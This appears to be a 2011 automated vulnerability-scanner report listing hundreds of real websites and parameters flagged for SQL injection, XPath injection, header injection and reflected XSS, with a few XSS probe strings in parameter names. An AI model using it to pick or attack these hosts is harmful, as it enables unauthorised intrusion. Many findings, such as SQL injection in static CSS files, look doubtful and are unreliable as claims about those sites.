Cross Site Scripting, PoC, SQL Injection, Vulnerable Host Report

CloudScan Vulnerability Crawler Report for January 24, 2011

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 10:42:47 CST 2011.


DORK CWE-79 XSS Report

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [sz parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]

1.4. http://googleads.g.doubleclick.net/pagead/ads [ga_hid parameter]

1.5. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

1.6. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

1.7. http://hairmakeup.tweetmeme.com/ [User-Agent HTTP header]

1.8. http://kontentdesign.com/ [name of an arbitrarily supplied request parameter]

1.9. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 1]

1.10. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 2]

1.11. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 3]

1.12. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 4]

1.13. http://kontentdesign.com/media/system/js/caption.js [name of an arbitrarily supplied request parameter]

1.14. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 1]

1.15. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 2]

1.16. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 3]

1.17. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 4]

1.18. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 5]

1.19. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [name of an arbitrarily supplied request parameter]

1.20. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 1]

1.21. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 2]

1.22. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 3]

1.23. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 4]

1.24. http://kontentdesign.com/templates/kontent11/css/layout.css [name of an arbitrarily supplied request parameter]

1.25. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 1]

1.26. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 2]

1.27. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 3]

1.28. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 4]

1.29. http://kontentdesign.com/templates/kontent11/css/reset.css [name of an arbitrarily supplied request parameter]

1.30. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 1]

1.31. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 2]

1.32. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 3]

1.33. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 4]

1.34. http://kontentdesign.com/templates/kontent11/css/typography.css [name of an arbitrarily supplied request parameter]

1.35. http://news.google.com/news/story [REST URL parameter 2]

1.36. http://news.google.com/nwshp [Referer HTTP header]

1.37. http://powersportsnetwork.com/ [Referer HTTP header]

1.38. http://spongecell.com/event_page/view/915725 [Referer HTTP header]

1.39. http://techcrunch.com/ [name of an arbitrarily supplied request parameter]

1.40. http://trsrvr.com/x/www/delivery/ck.php [zoneid parameter]

1.41. http://tweetmeme.com/story/1452917957/ [__utmv cookie]

1.42. http://tweetmeme.com/story/3636556715/ [__csref cookie]

1.43. http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 [tm_identity cookie]

1.44. http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid [__utmv cookie]

1.45. http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday [__csv cookie]

1.46. http://tweetmeme.com/user/KDthunderup [tm_identity cookie]

1.47. http://tweetmeme.com/user/RWW [__csnv cookie]

1.48. http://tweetmeme.com/user/reiserlaw [__qca cookie]

1.49. http://www.abbreviations.com/getsugg.aspx [ltrs parameter]

1.50. http://www.beirut.com/Restaurants/Dining/314749128 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie]

1.51. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie]

1.52. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3]

1.53. http://www.beirut.com/images/loaders/big/purple-ajax-loader.gif [REST URL parameter 4]

1.54. http://www.dominionenterprises.com/main/do/Privacy_Policy [REST URL parameter 3]

1.55. http://www.flashedition.com/publication [i parameter]

1.56. http://www.flashedition.com/publication [m parameter]

1.57. http://www.forrent.com/ [User-Agent HTTP header]

1.58. http://www.kiteship.com/ [Referer HTTP header]

1.59. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]

1.60. http://www.linkagogo.com/go/AddNoPopup [Referer HTTP header]

1.61. http://www.linkagogo.com/go/AddNoPopup [url parameter]

1.62. http://www.netlingo.com/ [name of an arbitrarily supplied request parameter]

1.63. http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter]

1.64. http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter]

1.65. http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter]

1.66. http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter]

1.67. http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter]

1.68. http://www.netlingo.com/archive.php [name of an arbitrarily supplied request parameter]

1.69. http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter]

1.70. http://www.netlingo.com/category/acronyms.php [name of an arbitrarily supplied request parameter]

1.71. http://www.netlingo.com/category/business.php [name of an arbitrarily supplied request parameter]

1.72. http://www.netlingo.com/category/hardware.php [name of an arbitrarily supplied request parameter]

1.73. http://www.netlingo.com/category/marketing.php [name of an arbitrarily supplied request parameter]

1.74. http://www.netlingo.com/category/net-organization.php [name of an arbitrarily supplied request parameter]

1.75. http://www.netlingo.com/category/programming.php [name of an arbitrarily supplied request parameter]

1.76. http://www.netlingo.com/category/software.php [name of an arbitrarily supplied request parameter]

1.77. http://www.netlingo.com/category/technology.php [name of an arbitrarily supplied request parameter]

1.78. http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter]

1.79. http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter]

1.80. http://www.netlingo.com/country.php [name of an arbitrarily supplied request parameter]

1.81. http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter]

1.82. http://www.netlingo.com/index.php [name of an arbitrarily supplied request parameter]

1.83. http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter]

1.84. http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter]

1.85. http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter]

1.86. http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter]

1.87. http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter]

1.88. http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter]

1.89. http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter]

1.90. http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter]

1.91. http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter]

1.92. http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter]

1.93. http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter]

1.94. http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter]

1.95. http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter]

1.96. http://www.netlingo.com/search.php [name of an arbitrarily supplied request parameter]

1.97. http://www.netlingo.com/searchaction.cfm [name of an arbitrarily supplied request parameter]

1.98. http://www.netlingo.com/searchaction.cfm [wordsearch parameter]

1.99. http://www.netlingo.com/shop/index.php [name of an arbitrarily supplied request parameter]

1.100. http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter]

1.101. http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter]

1.102. http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter]

1.103. http://www.netlingo.com/shop/shopping-cart.php [name of an arbitrarily supplied request parameter]

1.104. http://www.netlingo.com/smileys.php [name of an arbitrarily supplied request parameter]

1.105. http://www.netlingo.com/subscribe.php [name of an arbitrarily supplied request parameter]

1.106. http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter]

1.107. http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter]

1.108. http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter]

1.109. http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter]

1.110. http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter]

1.111. http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter]

1.112. http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter]

1.113. http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter]

1.114. http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter]

1.115. http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter]

1.116. http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter]

1.117. http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter]

1.118. http://www.netlingo.com/top50/acronyms-for-parents.php [name of an arbitrarily supplied request parameter]

1.119. http://www.netlingo.com/top50/business-text-terms.php [name of an arbitrarily supplied request parameter]

1.120. http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter]

1.121. http://www.netlingo.com/top50/newbie-terms.php [name of an arbitrarily supplied request parameter]

1.122. http://www.netlingo.com/top50/popular-text-terms.php [name of an arbitrarily supplied request parameter]

1.123. http://www.netlingo.com/unsubscribe.php [name of an arbitrarily supplied request parameter]

1.124. http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter]

1.125. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2]

1.126. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 1]

1.127. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 2]

1.128. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]

1.129. https://www.paperg.com/post.php [bid parameter]

1.130. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

1.131. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

1.132. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

1.133. http://www.soundingsonline.com/archives ['"--> parameter]

1.134. http://www.soundingsonline.com/archives ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter]

1.135. http://www.soundingsonline.com/archives [User-Agent HTTP header]

1.136. http://www.soundingsonline.com/archives [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.137. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.138. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.139. http://www.soundingsonline.com/archives [s_lv_s cookie]

1.140. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

1.141. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

1.142. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

1.143. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

1.144. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

1.145. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

1.146. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

1.147. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

1.148. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

1.149. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

1.150. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

1.151. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

1.152. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

1.153. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

1.154. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

1.155. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

1.156. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

1.157. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

1.158. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

1.159. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

1.160. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

1.161. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

1.162. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

1.163. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

1.164. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

1.165. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

1.166. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

1.167. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

1.168. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

1.169. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

1.170. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

1.171. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

1.172. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

1.173. http://www.soundingsonline.com/index.php [Itemid parameter]

1.174. http://www.soundingsonline.com/index.php [chronoformname parameter]

1.175. http://www.soundingsonline.com/index.php [id parameter]

1.176. http://www.soundingsonline.com/index.php [layout parameter]

1.177. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.178. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.179. http://www.soundingsonline.com/index.php [option parameter]

1.180. http://www.soundingsonline.com/index.php [view parameter]

1.181. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

1.182. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

1.183. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

1.184. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

1.185. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

1.186. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

1.187. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

1.188. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

1.189. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

1.190. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

1.191. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

1.192. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

1.193. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

1.194. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

1.195. http://www.woothemes.com/ [name of an arbitrarily supplied request parameter]

2. XPath injection

2.1. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]

2.2. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html [REST URL parameter 1]

2.3. http://www.facebook.com/miofeghali [wd cookie]

2.4. http://www.w3.org/TR [Referer HTTP header]

2.5. http://www.w3.org/TR [User-Agent HTTP header]

2.6. http://www.w3.org/TR [name of an arbitrarily supplied request parameter]

3. HTTP header injection

3.1. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3 [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363 [REST URL parameter 1]

3.3. http://ad.doubleclick.net/adj/fmpub.tweetmeme/ [REST URL parameter 1]

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.5. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [REST URL parameter 1]

3.6. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [name of an arbitrarily supplied request parameter]

3.7. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]

3.8. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction [REST URL parameter 1]

3.9. http://rd.apmebf.com/w/pg [REST URL parameter 1]

3.10. http://rd.apmebf.com/w/pg [REST URL parameter 2]

3.11. http://rd.apmebf.com/w/pg [S cookie]

3.12. http://segnalo.alice.it/post.html.php [REST URL parameter 1]

3.13. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

3.14. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

3.15. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]

4.2. http://ads.tweetmeme.com/serve.js [height parameter]

4.3. http://ads.tweetmeme.com/serve.js [width parameter]

4.4. http://adserver.teracent.net/tase/ad [AMod parameter]

4.5. http://adserver.teracent.net/tase/ad [AMod parameter]

4.6. http://adserver.teracent.net/tase/ad [ASeg parameter]

4.7. http://adserver.teracent.net/tase/ad [ASeg parameter]

4.8. http://adserver.teracent.net/tase/ad [AdID parameter]

4.9. http://adserver.teracent.net/tase/ad [AdID parameter]

4.10. http://adserver.teracent.net/tase/ad [FlightID parameter]

4.11. http://adserver.teracent.net/tase/ad [FlightID parameter]

4.12. http://adserver.teracent.net/tase/ad [RawValues parameter]

4.13. http://adserver.teracent.net/tase/ad [RawValues parameter]

4.14. http://adserver.teracent.net/tase/ad [Redirect parameter]

4.15. http://adserver.teracent.net/tase/ad [Redirect parameter]

4.16. http://adserver.teracent.net/tase/ad [Segments parameter]

4.17. http://adserver.teracent.net/tase/ad [Segments parameter]

4.18. http://adserver.teracent.net/tase/ad [TargetID parameter]

4.19. http://adserver.teracent.net/tase/ad [TargetID parameter]

4.20. http://adserver.teracent.net/tase/ad [Targets parameter]

4.21. http://adserver.teracent.net/tase/ad [Targets parameter]

4.22. http://adserver.teracent.net/tase/ad [Values parameter]

4.23. http://adserver.teracent.net/tase/ad [Values parameter]

4.24. http://adserver.teracent.net/tase/ad [adId parameter]

4.25. http://adserver.teracent.net/tase/ad [adId parameter]

4.26. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

4.27. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

4.28. http://adserver.teracent.net/tase/ad [rcu parameter]

4.29. http://adserver.teracent.net/tase/ad [rcu parameter]

4.30. http://api.facebook.com/restserver.php [method parameter]

4.31. http://api.facebook.com/restserver.php [urls parameter]

4.32. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

4.33. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard [mbox parameter]

4.34. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.35. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.36. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.37. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.38. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.42. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

4.43. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

4.44. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

4.45. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 2]

4.46. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 3]

4.47. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 4]

4.48. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 5]

4.49. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 6]

4.50. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 7]

4.51. http://bid.openx.net/json [c parameter]

4.52. http://bid.openx.net/json [c parameter]

4.53. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 7]

4.54. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 8]

4.55. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [monid parameter]

4.56. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [name of an arbitrarily supplied request parameter]

4.57. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [btid parameter]

4.58. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [ei parameter]

4.59. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [rtbhost parameter]

4.60. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [wp_exchange parameter]

4.61. http://click.linksynergy.com/fs-bin/click [offerid parameter]

4.62. http://delb.opt.fimserve.com/fimbid/ [cb parameter]

4.63. http://developer.joomla.org/a [REST URL parameter 1]

4.64. http://developer.joomla.org/getting-started.html [REST URL parameter 1]

4.65. http://developer.joomla.org/improving-joomla.html [REST URL parameter 1]

4.66. http://developer.joomla.org/security.html [REST URL parameter 1]

4.67. http://developer.joomla.org/security/a [REST URL parameter 2]

4.68. http://developer.joomla.org/security/news.html [REST URL parameter 2]

4.69. http://developer.joomla.org/security/news.html [name of an arbitrarily supplied request parameter]

4.70. http://developer.joomla.org/strategy.html [REST URL parameter 1]

4.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 2]

4.72. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 3]

4.73. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 4]

4.74. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 2]

4.75. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 3]

4.76. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 4]

4.77. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]

4.78. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]

4.79. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]

4.80. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json [callback parameter]

4.81. http://ds.addthis.com/red/psi/sites/www3.whdh.com/p.json [callback parameter]

4.82. https://fonts.googleapis.com/css [family parameter]

4.83. http://help.tweetmeme.com/ [name of an arbitrarily supplied request parameter]

4.84. http://help.tweetmeme.com/2009/04/07/api-documentation/ [REST URL parameter 4]

4.85. http://help.tweetmeme.com/2009/04/07/api-documentation/ [name of an arbitrarily supplied request parameter]

4.86. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [REST URL parameter 4]

4.87. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [name of an arbitrarily supplied request parameter]

4.88. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [REST URL parameter 4]

4.89. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [name of an arbitrarily supplied request parameter]

4.90. http://help.tweetmeme.com/contact/ [REST URL parameter 1]

4.91. http://help.tweetmeme.com/contact/ [name of an arbitrarily supplied request parameter]

4.92. http://help.tweetmeme.com/faq [REST URL parameter 1]

4.93. http://help.tweetmeme.com/forum [REST URL parameter 1]

4.94. http://help.tweetmeme.com/forum [name of an arbitrarily supplied request parameter]

4.95. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 1]

4.96. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 2]

4.97. http://help.tweetmeme.com/forum/forum/33 [name of an arbitrarily supplied request parameter]

4.98. http://help.tweetmeme.com/language/ [REST URL parameter 1]

4.99. http://help.tweetmeme.com/language/ [name of an arbitrarily supplied request parameter]

4.100. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]

4.101. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]

4.102. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]

4.103. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]

4.104. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]

4.105. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]

4.106. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]

4.107. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]

4.108. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]

4.109. http://java.sun.com/products/plugin/autodl [REST URL parameter 1]

4.110. http://java.sun.com/products/plugin/autodl [REST URL parameter 2]

4.111. http://java.sun.com/products/plugin/autodl [REST URL parameter 3]

4.112. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]

4.113. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]

4.114. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]

4.115. http://joomlacode.org/gf/account/ [redirect parameter]

4.116. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]

4.117. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]

4.118. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]

4.119. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]

4.120. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]

4.121. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]

4.122. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]

4.123. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]

4.124. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]

4.125. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]

4.126. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]

4.127. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]

4.128. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]

4.129. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]

4.130. http://joomlacode.org/gf/project/joomla/reporting/ [name of an arbitrarily supplied request parameter]

4.131. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]

4.132. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]

4.133. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]

4.134. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]

4.135. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]

4.136. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]

4.137. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]

4.138. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]

4.139. http://joomlacode.org/gf/snippet/ [name of an arbitrarily supplied request parameter]

4.140. http://jqueryui.com/themeroller/ [bgColorActive parameter]

4.141. http://jqueryui.com/themeroller/ [bgColorContent parameter]

4.142. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

4.143. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

4.144. http://jqueryui.com/themeroller/ [bgColorHover parameter]

4.145. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

4.146. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

